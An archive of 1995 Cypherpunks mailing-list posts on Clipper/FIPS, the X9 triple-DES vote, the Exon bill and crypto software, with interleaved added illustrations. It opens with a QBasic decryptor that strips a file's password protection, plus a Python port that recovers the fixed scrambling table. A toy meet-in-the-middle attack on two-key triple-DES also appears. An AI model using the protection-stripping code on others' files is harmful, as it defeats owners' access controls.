  fp& = fp& + 4
  IF blen > 0 THEN
    cblk$ = INPUT$(blen, #2)
    x$ = decrypt$(cblk$, fp& - 4, blen)
    IF blen = 2 THEN
      SELECT CASE btyp
        CASE 18, 19, 99
          x$ = STRING$(2, 0)
      END SELECT
    END IF
    PUT #1, , x$
  END IF
  fp& = fp& + blen
  cbh$ = INPUT$(4, #2)
WEND
CLOSE #1
CLOSE #2
END

FUNCTION decrypt$ (c$, adr&, blen)
  offset = (adr& + blen) AND 15
  d$ = STRING$(blen, 0)
  FOR i = 1 TO blen
    c = ASC(MID$(c$, i, 1))
    crot = ((c * 8) MOD 256) OR (c \ 32)
    ctst = magic(offset)
    clss = (2 * (crot AND ctst)) AND 255
    d = (256 + crot + ctst - clss) AND 255
    MID$(d$, i, 1) = CHR$(d)
    offset = (offset + 1) AND 15
  NEXT
  decrypt$ = d$
END FUNCTION
-------------------cut here------------------------------

Alan Griffiths        CAA NERC Project    agriffiths@vnet.ibm.com
Tel: +44-705-561325                       Fax: +44-705-214094

All opinions expressed are my own and do not represent IBM in any way
___________________________________________________________________________
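
An added illustration, not part of either post above: the byte transform in the QBasic decrypt$ function, rewritten in Python to show that its arithmetic is a rotate-left-by-3 followed by XOR with one of 16 fixed table bytes, so a single known record gives the whole table back. The names scramble_block and recover_table and the sample record are constructed for this example; only the 16-byte table and the offset rule come from the posted program.

```python
# Added example; only MAGIC and the offset rule are taken from the QBasic listing.
MAGIC = bytes([196, 115, 164, 32, 60, 91, 212, 23,
               240, 31, 40, 19, 240, 75, 180, 3])   # the DATA line of the program


def rotl8(c, n):
    """Rotate an 8-bit value left by n bits."""
    return ((c << n) | (c >> (8 - n))) & 0xFF


def rotr8(c, n):
    """Rotate an 8-bit value right by n bits."""
    return ((c >> n) | (c << (8 - n))) & 0xFF


def descramble_arith(c, key):
    """One byte, computed with the same arithmetic as the QBasic decrypt$."""
    crot = ((c * 8) % 256) | (c // 32)
    clss = (2 * (crot & key)) & 255
    return (256 + crot + key - clss) & 255


def descramble(c, key):
    """The same byte transform in its plain form: a + b - 2*(a AND b) == a XOR b."""
    return rotl8(c, 3) ^ key


def descramble_block(data, adr, magic=MAGIC):
    """Port of decrypt$; adr is the value the original main loop passes as adr&."""
    offset = (adr + len(data)) & 15
    out = bytearray()
    for c in data:
        out.append(descramble(c, magic[offset]))
        offset = (offset + 1) & 15
    return bytes(out)


def scramble_block(data, adr, magic=MAGIC):
    """Inverse of descramble_block (hypothetical helper, used to build test data)."""
    offset = (adr + len(data)) & 15
    out = bytearray()
    for p in data:
        out.append(rotr8(p ^ magic[offset], 3))
        offset = (offset + 1) & 15
    return bytes(out)


def recover_table(cipher, plain, adr):
    """Rebuild the table from one scrambled record whose content is known.

    The table does not depend on the password, so 16 known bytes suffice.
    """
    table = [None] * 16
    offset = (adr + len(cipher)) & 15
    for c, p in zip(cipher, plain):
        table[offset] = rotl8(c, 3) ^ p
        offset = (offset + 1) & 15
    return table


if __name__ == "__main__":
    sample = b"constructed sample record bytes"   # constructed input, not Excel data
    scrambled = scramble_block(sample, 0x1A2)
    print(descramble_block(scrambled, 0x1A2))
    print(recover_table(scrambled, sample, 0x1A2))
```

Because the table is the same for every file, the scrambling hides nothing from anyone who has seen one protected document with known content; the 16-bit password hash is only a flag the application checks.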





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Mon, 13 Feb 95 17:18:00 PST
To: cypherpunks@toad.com
Subject: Re: What *is* the power of the FIPS
In-Reply-To: <Pine.3.89.9502131927.B13826-0100000@world.std.com>
Message-ID: <199502140117.RAA17498@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Peter F Cassidy <pcassidy@world.std.com> writes:
>...                          I animated the characters and campaign
> strategies in this narrative common to the clipper and DT initiatives. In 
> that, talking about Clipper I mentioned its rise as a FIPS, etc. 
> -        QUESTION: Just what is the power of the FIPS outside of the 
> interop issues in sending stuff back and forth from federal agencies?

Seems to me a FIPS is an important standard to the extent that it contains
important and useful information.  The DES FIPS 46-2 and 81 do, and
they've been widely influential.  The EES (Clipper) FIPS 185 doesn't --
it's mostly terminology to support GACK (Government Access to Crypto Keys)
-- and has been largely ignored outside of said federal agencies, so far
as I know.

	Jim Gillogly
	Mersday, 24 Solmath S.R. 1995, 01:16




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Mon, 13 Feb 95 17:53:17 PST
To: Samuel Kaplin <skaplin@mirage.skypoint.com>
Subject: Re: EPIC to Debate Exon on CNN
In-Reply-To: <Pine.SV4.3.91.950213174509.24624A-100000@mirage.skypoint.com>
Message-ID: <Pine.3.89.9502131742.A19443-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 13 Feb 1995, Samuel Kaplin wrote:
>  A sellout was offered a 
> la EFF and DT. Mr. Rotenberg seemed ill prepared and not really 
> interested in the issue.

You expected something different from "EPIC"?

Cypherpunks are supposed to be paranoid.  You are
not paranoid enough.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@rand.org>
Date: Mon, 13 Feb 95 17:31:07 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: CDT POLICY POST No.2 -- X9 TO DEVELOP TRIPLE-DES STANDARDS
In-Reply-To: <199502140114.UAA17825@ducie.cs.umass.edu>
Message-ID: <199502140131.RAA17561@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> "L. McCarthy" <lmccarth@ducie.cs.umass.edu> writes:
> Are the minutes of the deliberations of X9, in complete or digest form,
> available to the public anywhere ? It would be useful to get a sense of how
> close the vote was, whose representatives voted which way, and the arguments

I haven't seen that kind of detail, but here's a piece with some of the
players posted by one member in December.  I don't have the message from
voorhees that he responded to.

	Jim Gillogly
	Mersday, 24 Solmath S.R. 1995, 01:27
_________________________________________________________________

From: x9a3@aol.com (X9a3)
Newsgroups: talk.politics.crypto
Subject: Re: Triple-DES
Date: 12 Dec 1994 20:50:26 -0500
Organization: America Online, Inc. (1-800-827-6364)
Lines: 29
Sender: news@newsbf01.news.aol.com
Message-ID: <3ciul2$hc8@newsbf01.news.aol.com>
References: <3cg57o$hvq@interport.net>
NNTP-Posting-Host: newsbf01.news.aol.com

In article <3cg57o$hvq@interport.net>, voorhees@interport.net writes:

Rich has the 3DES ballot results correct. It is currently out for
reconsideration which happens when there are 'no' votes.  It is expected
to pass.  Marty Ferris (Treasury and chair of X9F) chaired the X9F meeting
in Austin - which I attended as well as the earlier meeting of X9F4 on
Home Banking - and reported that the 3DES WI would probably go to Blake
and X9F1.  There will probably be a subworking group chaired by Glenda
Barnes of Cylink to shepherd the 3DES along. Several of us will be
participating in the action.  We don't intend to let Blake sit on it or
kill it.  His rantings over some of the DES stuff are based on pure
conjecture and perhaps visions delivered in the night by NSA.  There are
no short cuts to a properly implemented DES system - only exhaustion. Ask
Biham and Shamir. The majority of folks (read banks) interested in 3DES
want to see a two key system and not the 3 key proposed by Cylink for a
variety of reasons.  2key EDE DES produces key strength of 112 and not
somewhere between 70 and 80 as claimed by Father Blake.  The 70-80 is
probably more disinformation from the NSA to make SKIPJACK appear more
acceptable.  Many of us are convinced that Blake is paid by the spooks but
he will not publicly admit that he is.     The 3DES WI originated in X9F3
chaired by Gary Chauklin of the FRB and the 3DES WI was moved from X9F3 to
X9F1 over the objections of the X9F3 members and Gary.  When Marty was
questioned how that decision was made it became clear it was arbitrary and
Marty probably made it himself.  The meeting will be in Feb in Baltimore -
should be interesting.....         watch this space!!!                    
          ... peace ... abe

Abraham & Associates, Inc.; Applications in Cryptography;  Concord, NC
_________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 13 Feb 95 17:36:40 PST
To: cypherpunks@toad.com
Subject: French Mystics, Martin Gardner, and Transcendentality
Message-ID: <199502140136.RAA11222@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


An anonymous traveler on the Path writes:

 > Actually, the French group is a subsidiary of our Bavarian
 > operation. However, "centuries" is, well, somewhat
 > inaccurate, though the mathematician who first mentioned our
 > existence about that time has since recanted after a visit
 > from the Elders...

"Centuries" was perhaps an exaggeration.  I first became aware of
the existence of the French group when Martin Gardner published
an extremely interesting April Fool's edition of "Mathematical
Games" in Scientific American a number of years back.

The thesis of his piece was that some very simple expressions
involving transcendental numbers such as Pi and E had been proven
to be integers. When you checked them on a calculator, they did
indeed appear to be exact integers, in spite of a well-known
theorem which claimed otherwise.

The clever trick was that they were of course transcendental, but
differed from integers by a small epsilon far beyond the 15 digit
range of most ordinary calculators.

A number of us were trying to figure out how Martin Gardner had
constructed the expressions he had published, and quickly found
that doing so was a non-trivial mathematical problem.  We were
about to give up when a young associate professor walked in,
picked up a piece of chalk, and demonstrated a really clever
trick involving rings which permitted one to crank out such
expressions with the greatest of ease.

When we inquired as to the origin of the work he was citing, we
were told that this really clever mystical order in France had
recently decided to release this particular discovery into the
public domain, where it had served as the source for Martin
Gardner's baffling column.

Perhaps they will give us a factoring algorithm if we ask them
nicely. :)

-- 
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Mon, 13 Feb 95 16:40:57 PST
To: unicorn@access.digex.net (Black Unicorn)
Subject: Re: your mail
In-Reply-To: <Pine.SUN.3.91.950213181829.14382C-100000@access3.digex.net>
Message-ID: <199502140040.RAA24255@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Black Unicorn writes:

> Has anyone checked into the software package "CryptDisk" for the 
> Macintosh?  It seems to be the Macintosh complement to SecureDrive, but 
> one must register and drop an extra $20 for the source code.
> 
> I don't want to get into the issue of copyright and such, only the 
> question of how much public scrutiny the source code for this application 
> has seen.
> 
> Anyone taken a peek?

I have a copy of it. I haven't reviewed it in detail yet, but the general
features look quite solid. I'll post a review of the methods when I've
had a better look, if people are interested.

                                 -- Will




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Mon, 13 Feb 95 14:42:02 PST
To: cypherpunks@toad.com
Subject: CNN (fwd) Communications (In)Decency Act?
Message-ID: <199502132241.RAA14045@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:

This was just sent to me.

> Date: Mon, 13 Feb 1995 14:31:08 -0800
> Subject: CNN
> Content-Type: text
> Content-Length: 309
> 
>  CNN's 6:00 p.m. (EST) news broadcast tonight (2/13) will include a
>  live segment on S. 314, "The Communications Decency Act," introduced by
>  Sen. James Exon (D-NE).  Judy Woodruff will moderate a discussion
>  of the bill with Sen. Exon and Marc Rotenberg of the Electronic
>  Privacy Information Center (EPIC).
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@rand.org>
Date: Mon, 13 Feb 95 17:48:00 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: CDT POLICY POST No.2 -- X9 TO DEVELOP TRIPLE-DES STANDARDS
In-Reply-To: <199502140131.RAA17561@mycroft.rand.org>
Message-ID: <199502140147.RAA17640@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Jim Gillogly <jim@rand.org> writes:
>...I don't have the message from voorhees that he responded to.

Woops, just found it.  This is the predecessor to my previous forward
from x9a3, relating to Triple DES (3DES), complete with votes.

	Jim Gillogly
	Mersday, 24 Solmath S.R. 1995, 01:46

_________________________________________________________________

From: voorhees@interport.net
Newsgroups: talk.politics.crypto
Subject: Triple-DES
Date: 12 Dec 1994 00:24:24 GMT
Organization: Interport Communications
Lines: 87
Message-ID: <3cg57o$hvq@interport.net>
Reply-To: voorhees@interport.net
NNTP-Posting-Host: voorhees.port.net
X-Newsreader: IBM NewsReader/2 v1.03

The following post is from Rich Ankney, a member of
X9F1 and possibly F3, too.

He does not have easy access to newsgroups, so I am
posting it on his behalf.

--Mark



I have a few comments on triple DES:

1.  X9F1 to Develop the Standard?

I read with interest your recent Usenet post about triple DES. I was not
aware that Marty Ferris (X9F chair) had already (officially) decided to
give the work to Blake. We (various X9F1/3 members) had figured the way
to delay it the longest is to form a new working group (X9F5:-).

2.  Blake's Opinions

Blake's claim is that triple DES (with two keys) is not 112 bits strong;
in fact it is somewhere between 70 and 80 bits strong. He gives no
details to back this up, though.  His other objection is that, since there
are only 32 bits input to the DES S-boxes in each round, at some point in
the future (say 10 years or so) this can be "cryptanalyzed" using table
lookups rather than test encryptions or other means, even on a desktop
sized machine (with lots of memory).  This is actually a reasonable
prediction, but it applies to single DES.  As to two-key triple DES, the
only published attack I'm aware of is a paper by Paul van Oorschot and
Michael Wiener of BNR (cited in Applied Cryptography, among other places);
their attack uses *lots* of memory and running time of less than 2^100
steps. I guess it all depends on who you think is the better
cryptanalyst:-)  Anyway, the X9 proposal was to use three-key triple DES;
one would hope that's at least 112 bits strong.

3.  The X9 Vote

I got the voting record from X9 on the triple DES NWI:

YES:  Applied Communications, AT&T, Bank of America, Bank of Boston,
Chemical Bank, Deluxe Check Printers(!), Federal Reserve, Fidelity
Investments, Mastercard, Mellon Bank, VISA, Wells Fargo.

NO:  NSA, NationsBank (their rep is X9 chair).

ABSTAIN:  ABA, American Express, Canadian Bankers Assoc., Moore Business
Forms, NIST, Unisys, Xerox.

10 members didn't return their ballots, including Citibank, Chase
Manhattan, and IBM.  This is not unusual for larger organizations
where the ballots sit on someone's desk for three or four months.  I
imagine many will be voting on the reconsideration ballot.

NO votes must have reasons, and abstentions typically do as well:

NSA:  We've seen their reasons already in earlier postings.
NationsBank:  Too much controversy and too many open issues (based, I
   would think, on the NSA comments)
ABA:  Concerned about the NSA comments (esp. exportability) and that
   adopting triple DES now would affect the number of options available
   in the long term.  ABA is opposed to Clipper/Capstone as currently
   proposed.  In particular:  (a) it must have congressional support,
   (b) at least one escrow agent must be a private sector entity, (c) it
   must be exportable, (d) there must be a *demonstrable* mechanism
   whereby escrow keys used in wiretap equipment cannot be compromised
   and are destroyed at the end of the wiretap period, (e) the
   algorithm must be unclassified or made available for an acceptable
   evaluation procedure by the banking industry, and (f) analysis of other
   issues is needed, including possibility of software implementation, and
   compatibility with installed DES infrastructure.
Federal Reserve:  Supports triple DES, as an immediate alternative to DES.
   Also offers some much less negative wording for the reconsideration
   ballot.  (The original ballot did everything but recommend a NO vote.)



I don't have Usenet access (without "borrowing" a friend's account), so
please feel free to repost any of this you feel might interest the
EFF and other newsgroups.



Regards,
Rich Ankney
(Fischer Int'l)
_________________________________________________________________
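
An added illustration, not part of the forwarded posts: why two-key EDE falls short of the full strength of its combined key. It runs the chosen-plaintext meet-in-the-middle attack of Merkle and Hellman against a toy 16-bit Feistel cipher with 10-bit keys (constructed here, not DES); the van Oorschot and Wiener paper cited above turns the same idea into a known-plaintext attack. All names and key values below are constructed for the example.

```python
# Added example. The cipher is a toy stand-in for DES so the attack finishes instantly.
KEY_BITS = 10                      # toy key size; DES uses 56
ROUNDS = 4
SBOX = [pow(i + 1, 3, 257) % 256 for i in range(256)]   # arbitrary fixed round table


def _subkey(key, rnd):
    """Derive an 8-bit round key from the toy key (constructed schedule)."""
    return ((key * 2654435761) >> (4 * rnd + 3)) & 0xFF


def _f(half, key, rnd):
    return SBOX[half ^ _subkey(key, rnd)]


def encrypt(key, block):
    """Single toy encryption of a 16-bit block (balanced Feistel)."""
    left, right = block >> 8, block & 0xFF
    for rnd in range(ROUNDS):
        left, right = right, left ^ _f(right, key, rnd)
    return (left << 8) | right


def decrypt(key, block):
    """Inverse of encrypt."""
    left, right = block >> 8, block & 0xFF
    for rnd in reversed(range(ROUNDS)):
        left, right = right ^ _f(left, key, rnd), left
    return (left << 8) | right


def ede2_encrypt(k1, k2, block):
    """Two-key triple encryption: E_k1(D_k2(E_k1(block)))."""
    return encrypt(k1, decrypt(k2, encrypt(k1, block)))


def merkle_hellman(oracle, known_pairs):
    """Recover (k1, k2) with about 3 * 2^KEY_BITS cipher operations.

    oracle(p) returns the two-key EDE ciphertext of a chosen plaintext p.
    known_pairs are extra (plaintext, ciphertext) pairs used to discard
    false matches. Returns (candidate key pairs, cipher operations counted,
    excluding the few verification encryptions).
    """
    ops = 0
    table = {}
    for i in range(1 << KEY_BITS):
        p = decrypt(i, 0)              # if i == k1, the first stage maps p to 0
        b = decrypt(i, oracle(p))      # ... and then b equals D_k2(0)
        ops += 2
        table.setdefault(b, []).append(i)
    found = []
    for j in range(1 << KEY_BITS):
        ops += 1
        for i in table.get(decrypt(j, 0), []):   # meet in the middle on D_k2(0)
            if all(ede2_encrypt(i, j, p) == c for p, c in known_pairs):
                found.append((i, j))
    return found, ops


def demo(k1=0x2A7, k2=0x13C):
    """Attack a constructed key pair; exhaustive search would need 2^20 trials."""
    def oracle(p):
        return ede2_encrypt(k1, k2, p)
    known = [(p, oracle(p)) for p in (0x1234, 0xBEEF, 0x0F0F)]
    return merkle_hellman(oracle, known)


if __name__ == "__main__":
    print(demo())
```

The work grows with the size of one key, not two, at the price of one chosen plaintext and one table entry per candidate first key; that memory and data requirement is the "lots of memory" trade-off the post refers to.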




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Mon, 13 Feb 95 15:56:21 PST
To: cypherpunks@toad.com
Subject: Re: EPIC to Debate Exon on CNN
In-Reply-To: <n1419433051.47954@epic.org>
Message-ID: <Pine.SV4.3.91.950213174509.24624A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain




On 13 Feb 1995, Dave Banisar wrote:

> 
> 
> CNN's 6:00 p.m. (EST) news broadcast tonight (2/13) will include a
> segment on S. 314, "The Communications Decency Act," introduced by
> Sen. James Exon (D-NE).  Judy Woodruff will moderate a discussion 
> of the bill with Sen. Exon and Marc Rotenberg of the Electronic
> Privacy Information Center (EPIC).

Just got done watching it (and I have it on video tape.) In a nutshell, 
Senator Exon was much more convincing than Mr. Rotenberg. :( Why didn't
EPIC field someone with better debating skills? A sellout was offered a 
la EFF and DT. Mr. Rotenberg seemed ill prepared and not really 
interested in the issue. This is not a good omen. The perception left in 
my non-internet literate wife was that the INTERNET=smut. :(

All in all, not a good showing IMHO,

Sam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Mon, 13 Feb 95 15:21:09 PST
To: Cypherpunks List <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <Pine.SUN.3.91.950213181829.14382C-100000@access3.digex.net>
MIME-Version: 1.0
Content-Type: text/plain




Has anyone checked into the software package "CryptDisk" for the 
Macintosh?  It seems to be the Macintosh complement to SecureDrive, but 
one must register and drop an extra $20 for the source code.

I don't want to get into the issue of copyright and such, only the 
question of how much public scrutiny the source code for this application 
has seen.

Anyone taken a peek?

-uni- (Dark)


--
073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: (Bull Worldwide AutoResponder) <UseNet@news.bull.com>
Date: Mon, 13 Feb 95 15:37:56 PST
To: cypherpunks@toad.com
Subject: Re: lwall
Message-ID: <199502132337.AA59383@cass.ma02.bull.com>
MIME-Version: 1.0
Content-Type: text/plain


DO NOT PANIC!  REMAIN CALM!  READ *ALL* OF THIS MESSAGE BEFORE GETTING UPSET!

Your Usenet test article was received here at the news gateway machine at
Bull Worldwide Information Systems, in Billerica, MA, USA.

If you want to suppress this message in the future, include the word "ignore" 
in the Subject: header of any subsequent articles posted to *.test.  You could
also post your test articles with a Distribution: header of "local" to prevent
them from leaving your local machine, or you could also ask your local 
newsadmin to create a local *.test group that will not propagate outside of 
your organization.

There are typically 5 possible reasons why you were sent this e-mail message:

1) You intentionally posted a Usenet news article to a *.test newsgroup.  
These newsgroups exist so you can verify that your articles are being 
propagated correctly.  When your article arrives here, we send you this message
as confirmation.  We will only send you ONE e-mail reply for each of your test
articles that we see.

2) You unintentionally posted a Usenet news article to a *.test newsgroup.  
This is a bit of net.childishness caused by a Followup-To: header directing all
replies into a *.test newsgroup.  This is done by somebody upset with the
content of a discussion thread who wants to "punish" anybody who replies to his
message.  Your reply will be sent to *.test instead of the original newsgroup,
and you will start receiving autoresponder messages similar to this one that
you didn't ask for.  To avoid this in the future, look for a Followup-To:
header and make sure it's appropriate before replying to any articles.

3) You were a victim of a Reply-To: header directing your e-mail into a *.test
newsgroup via a mail->news gateway.  Similar to 2) above.

4) Somebody has forged a posting in your name to one of the *.test newsgroups.
To avoid this in the future, use better net.etiquette and you will make fewer
net.enemies.  If you want to try and identify the forger, use the following
procedure.  Make a legitimate posting to the same *.test newsgroup that the
forger used.  We will send you an e-mail reply.  Compare the Path: header from
this legitimate reply with the Path: header from the forgery.  The front
part of the two headers will be the same or topologically similar path to
your site.  Where the forged header becomes substantially different can
provide clues to where the forger lives.  Note that if you receive multiple
newsfeeds you may need to repeat this process several times so you can discover
all legitimate paths between our site and yours.  Once you think you've
identified the forger's site, try sending POLITE e-mail to the newsadmin/
sysadmin/postmaster explaining the situation.

5) You issued a cancel control message to a *.test newsgroup.  Some users
dislike autoresponses for cancel messages, but the newsadmins here think it
can be a valuable diagnostic tool for verifying cancel propagation.  If you
don't like it, use the "delete" key in your mail client!

All headers plus at most 10 lines of user text from your original article are
reproduced below for your perusal:

Path: cass.ma02.bull.com!steamer.clam.com!newsie.dmc.com!grapevine.lcs.mit.edu!uhog.mit.edu!news.mathworks.com!zombie.ncsc.mil!news.duke.edu!godot.cc.duq.edu!hudson.lm.com!news.pop.psu.edu!news.cac.psu.edu!howland.reston.ans.net!agate!overload.lbl.gov!emf.emf.net!hilbert.dnai.com!nbn!miwok!news.zeitgeist.net!ack.berkeley.edu!not-for-mail
Subject: lwall
Message-ID: <PINE4545-dhfsdkjc@ack.berkeley.edu>
NNTP-Posting-Host: ack.berkeley.edu
Organization: cypherpunks
Lines: 2
From: cypherpunks@toad.com
Distribution: world
Newsgroups: alt.test
Date: 6 Feb 1995 19:34:19 GMT

test
test
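
Added example, not part of the autoresponder message above: the Path: comparison from reason 4, written as a small script. The host names and sample headers are constructed for illustration; it compares hops from the front of the header, as the message describes, against every legitimate path you have collected.

```python
"""Find where a suspect Usenet Path: header departs from known-good ones."""


def parse_path(header):
    """Return the hops of a Path: header, front (leftmost) hop first."""
    value = header.strip()
    if value.lower().startswith("path:"):
        value = value[5:]
    # A folded header can contain spaces or newlines; hops are '!'-separated.
    hops = "".join(value.split()).split("!")
    return [hop.lower() for hop in hops if hop]


def shared_front(a, b):
    """Count how many leading hops two parsed paths have in common."""
    count = 0
    for hop_a, hop_b in zip(a, b):
        if hop_a != hop_b:
            break
        count += 1
    return count


def locate_divergence(suspect_header, legitimate_headers):
    """Compare a suspect path with every legitimate path and report the split.

    Several legitimate paths can exist when a site has multiple newsfeeds,
    so the legitimate path sharing the longest front with the suspect is used.
    """
    if not legitimate_headers:
        raise ValueError("need at least one legitimate Path: header")
    suspect = parse_path(suspect_header)
    known_hops = set()
    best_legit, best_shared = None, -1
    for header in legitimate_headers:
        legit = parse_path(header)
        known_hops.update(legit)
        shared = shared_front(suspect, legit)
        if shared > best_shared:
            best_legit, best_shared = legit, shared
    return {
        "shared_front": suspect[:best_shared],
        "last_common_site": suspect[best_shared - 1] if best_shared else None,
        "suspect_continues_via": suspect[best_shared:],
        "legitimate_continues_via": best_legit[best_shared:],
        # Hops seen on no legitimate path at all: the sites worth asking about.
        "unexplained_hops": [h for h in suspect if h not in known_hops],
    }


# Constructed sample headers (reserved .example names, not real sites).
LEGITIMATE = [
    "Path: responder.example!hub1.example!hub2.example!regional.example!"
    "user-site.example!not-for-mail",
    "Path: responder.example!hub1.example!altfeed.example!"
    "user-site.example!not-for-mail",
]
SUSPECT = (
    "Path: responder.example!hub1.example!hub2.example!other-feed.example!"
    "campus.example!user-site.example!not-for-mail"
)

if __name__ == "__main__":
    for field, value in locate_divergence(SUSPECT, LEGITIMATE).items():
        print(f"{field}: {value}")
```
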




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Mon, 13 Feb 95 18:53:11 PST
To: cypherpunks@toad.com
Subject: Re: CDT POLICY POST No.2 -- X9 TO DEVELOP TRIPLE-DES STANDARDS
Message-ID: <9502140251.AA28439@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Yahoo!

> From: Jack Repenning <jackr@dblues.engr.sgi.com>
>         In a November letter to committee members, the NSA
>         threatened to prevent the export of triple-DES, citing
>         existing US law and potential threats to national
>         security (see attached NSA letter).
> Oh, no, surely not.  There must be some misunderstanding here -
> they *promised* they wouldn't block export of non-Clipper
> things.  They wouldn't lie!

There's already some extra slack in the law and the official policy
for exporting encryption for use in banking; the NSA could get around it
by asking the banking regulators to impose some sort of Key Forfeiture nonsense,
which wouldn't lose much privacy since most banks are already
pretty cooperative about such things.

On the other hand, banks are rich enough to hire some off-shore programmer 
to write triple-DES implementations, given the current protocols,
as well as to lobby CONgress or the administration to keep the NSA in line.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Mon, 13 Feb 95 19:09:06 PST
To: pcassidy@world.std.com
Subject: Re:  What *is* the power of the FIPS
Message-ID: <9502140305.AA28564@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> -	QUESTION: Just what is the power of the FIPS outside of the 
> interop issues in sending stuff back and forth from federal agencies?

The basic purpose of a FIPS is to instruct government agencies
on what kinds of equipment/software they should buy.
Some FIPSs are mandatory, but most are pretty optional.
However, in this case, the purpose is basically propaganda -
the NIST can set standards, and can announce "Hey, this is standard",
and even try to get other government agencies to buy lots and
lots of Clipperphones.

The so-called FIPS for Clipper was a horrendous abuse of the FIPS process;
I took advantage of my 10 years as a defense contractor to flame out the
proposed spec in great detail.  I don't think I've still got my critique,
but essentially I contended that the proposed "Escrowed Encryption Standard"
didn't describe escrow, didn't specify encryption, and wasn't a standard....
It was fun, if you can do that sort of thing and not inhale :-)

It wasn't escrow, because the functions it describes aren't escrow,
and it doesn't mandate that they be used in a way that performs
escrow functions using the functions it does perform.
It didn't specify an encryption algorithm.
It wasn't an implementable standard, since it didn't contain enough
information for a user agency to specify an equipment design ("ask the NSA" 
just _doesn't_ rate), or for a vendor to validate whether an equipment design
is compliant, or for a user to tell if it's working properly.
From the commentary around the final FIPS, which differed in some detail
from the draft FIPS, it looks like most of the public comments were about
the political issues, but a couple of changes appeared to be responses to
technical details from the public, including things I'd flamed them about.
I don't know how positive I feel about that .....

		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pierre Uszynski <pierre@shell.portal.com>
Date: Mon, 13 Feb 95 19:11:24 PST
To: eric@remailer.net
Subject: ref on crypto formalism
Message-ID: <199502140310.TAA23087@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric,

I dug out one of the references I was thinking of when you were
talking last Saturday. A summary of the introduction would go:

"We describe a theory of authentication and a system that implements
it. Our theory is based on the notion of principal and a "speaks for"
relation between principals. A simple principal either has a name or is a
communication channel; a compound principal can express an adopted role
or delegation of authority. [...] We use the theory to explain
many existing and proposed mechanisms for security [...]"

So anyway, although I haven't read the whole thing in depth, it seems
to me a reasonable way to reason about complex security setups
to make decisions about them (including automatically).

%A Butler Lampson
%A Martin Abadi
%A Michael Burrows
%A Edward Wobber
%T authentication in distributed systems: theory and practice
%J Operating Systems Review (ACM SIGOPS Review)
%J Proceedings of the 13th ACM symposium on operating systems principles
%C Pacific Grove, CA
%D Oct. 13-16 1991
%V 25
%N 5
%P 165-182
%K transitive authentication, operating systems, DES, RSA, security,
channel, RPC, remote procedure calls, public key encryption, name
lookup, groups, access control, delegation, revocation, principals

I'm pretty sure I saw somewhere a companion paper titled something
like "An algebra of authentication"... hmmm  maybe even in CACM...
[...15 minutes later...] Unfortunately some of my CACMs are in hiding
and not properly indexed... It was work done at DEC SRC in Palo Alto,
there must be some research reports too.

If somebody has refs for any of these, it would be great if you'd
post them.

Pierre.
pierre@shell.portal.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Mon, 13 Feb 95 19:11:53 PST
To: cypherpunks@toad.com
Subject: Zimmerphone, IPhone, NetPhone, Maven...
Message-ID: <v03001403ab65cd6a5876@[140.174.229.219]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:46 2/13/95, usviszpz@ibmmail.com wrote:

>For those for whom this is already old news, I would like to ask: any idea if
>this technology is related in any way to VoicePGP? If not, any thoughts on the
>development ramifications of this for VoicePGP?

This is not related in any way to VoicePGP (which PRZ calls PGPFone and I
call the Zimmerphone).  On the CU-SeeMe discussion mailing list we've been
hashing out the performance of the costware IPhone (Windoze) and NetPhone
(Mac), and the freeware Maven (Mac).  They all suck less over 14.4.

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
      You couldn't get a clue during the clue mating season in         |
